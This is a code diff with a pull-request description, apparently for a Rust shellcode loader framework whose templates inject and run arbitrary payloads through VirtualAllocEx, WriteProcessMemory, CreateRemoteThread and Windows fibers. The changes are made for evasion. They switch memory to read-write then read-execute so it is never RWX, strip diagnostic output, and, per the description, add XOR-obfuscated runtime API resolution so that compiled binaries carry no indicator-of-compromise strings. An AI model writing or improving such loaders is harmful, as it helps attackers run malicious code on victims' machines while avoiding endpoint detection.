         if !NT_SUCCESS(protect_status) {
-            panic!("[-] Failed to call NtProtectVirtualMemory: {:#x}", protect_status);
+            return;
         }
 
         let buf_ptr: LPFIBER_START_ROUTINE = std::mem::transmute(allocstart);
@@ -58,7 +57,6 @@ fn enhance(mut buf: Vec<u8>) {
         let buf_fiber_address = CreateFiberEx(0, 0, 0, buf_ptr, null_mut());
 
         if buf_fiber_address.is_null() {
-            eprintln!("[!] CreateFiber Failed With Error: {}", GetLastError());
             return;
         }
 
@@ -66,10 +64,6 @@ fn enhance(mut buf: Vec<u8>) {
         // no need to move this call, already the lowest
         let primary_fiber_address = ConvertThreadToFiber(null_mut());
         if primary_fiber_address.is_null() {
-            eprintln!(
-                "[!] ConvertThreadToFiber Failed With Error: {}",
-                GetLastError()
-            );
             return;
         }
 

--- a/templates/winCRT/src/main.rs
+++ b/templates/winCRT/src/main.rs
@@ -6,7 +6,7 @@ use std::ffi::OsStr;
 use windows::Win32::System::Diagnostics::Debug::WriteProcessMemory;
 use windows::Win32::System::Memory::VirtualAllocEx;
 use windows::Win32::System::Memory::VirtualProtectEx;
-use windows::Win32::System::Memory::{MEM_COMMIT, PAGE_EXECUTE_READWRITE, PAGE_READWRITE};
+use windows::Win32::System::Memory::{MEM_COMMIT, PAGE_EXECUTE_READ, PAGE_READWRITE};
 use windows::Win32::System::Threading::CreateRemoteThread;
 use windows::Win32::System::Threading::OpenProcess;
 use windows::Win32::System::Threading::PROCESS_ALL_ACCESS;
@@ -43,12 +43,12 @@ fn enhance(buf: Vec<u8>, tar: usize) {
             buf.len(),
             Some(&mut byteswritten),
         );
-        let mut old_perms = PAGE_EXECUTE_READWRITE;
+        let mut old_perms = PAGE_READWRITE;
         let _bool = VirtualProtectEx(
             h_process,
             result_ptr,
             buf.len(),
-            PAGE_EXECUTE_READWRITE,
+            PAGE_EXECUTE_READ,
             &mut old_perms,
         );
         let _res_crt = CreateRemoteThread(
@@ -89,7 +89,7 @@ fn main() {
     }
     let list: Vec<usize> = boxboxbox(tar);
     if list.is_empty() {
-        panic!("[-] Unable to find a process.")
+        return;
     } else {
         for i in &list {
             {{MAIN}}

--- a/templates/winFIBER/src/main.rs
+++ b/templates/winFIBER/src/main.rs
@@ -3,7 +3,7 @@
 
 use std::ptr::{null, null_mut};
 
-use windows_sys::Win32::{Foundation::GetLastError, System::{Memory::{VirtualAlloc, VirtualProtect, MEM_COMMIT, PAGE_EXECUTE_READWRITE, PAGE_PROTECTION_FLAGS, PAGE_READWRITE}, Threading::{
+use windows_sys::Win32::{System::{Memory::{VirtualAlloc, VirtualProtect, MEM_COMMIT, PAGE_EXECUTE_READ, PAGE_PROTECTION_FLAGS, PAGE_READWRITE}, Threading::{
     ConvertThreadToFiber, CreateFiber, SwitchToFiber, LPFIBER_START_ROUTINE
 }}};
 
@@ -23,9 +23,9 @@ fn enhance(buf: Vec<u8>) {
         let alloc = VirtualAlloc(null(), buf.len(), MEM_COMMIT, PAGE_READWRITE);
         let alloc_ptr: *mut u8 = alloc as *mut u8;
         std::ptr::copy_nonoverlapping(buf.as_ptr(), alloc_ptr, buf.len());
-        let mut old_perms: PAGE_PROTECTION_FLAGS = PAGE_EXECUTE_READWRITE;
+        let mut old_perms: PAGE_PROTECTION_FLAGS = PAGE_READWRITE;
         
-        VirtualProtect(alloc, buf.len(), PAGE_EXECUTE_READWRITE, &mut old_perms);
+        VirtualProtect(alloc, buf.len(), PAGE_EXECUTE_READ, &mut old_perms);
 
         let buf_ptr: LPFIBER_START_ROUTINE = std::mem::transmute(alloc_ptr);
 
@@ -38,10 +38,6 @@ fn enhance(buf: Vec<u8>) {
         );
 
         if buf_fiber_address.is_null() {
-            eprintln!(
-                "[!] CreateFiber Failed With Error: {}",
-                GetLastError()
-            );
             return;
         }
 
@@ -49,10 +45,6 @@ fn enhance(buf: Vec<u8>) {
 
         let primary_fiber_address = ConvertThreadToFiber(null_mut());
         if primary_fiber_address.is_null() {
-            eprintln!(
-                "[!] ConvertThreadToFiber Failed With Error: {}",
-                GetLastError()
-            );
             return;
         }
 


### PR DESCRIPTION
- Replace PAGE_EXECUTE_READWRITE with PAGE_EXECUTE_READ in all 7 templates (RW→write→RX flow, never RWX). Breaking: dynamic shellcode no longer supported.
- Add dynamic API resolution for nt* templates (ntCRT, ntAPC, ntFIBER): resolve NT functions at runtime via GetProcAddress with XOR-obfuscated names. Random key generated per build. Removes ntapi crate dependency. to eliminate IoC strings from compiled binaries.
- Update README.md: document new evasion features, breaking change notice, add Dynamic API column to template tables.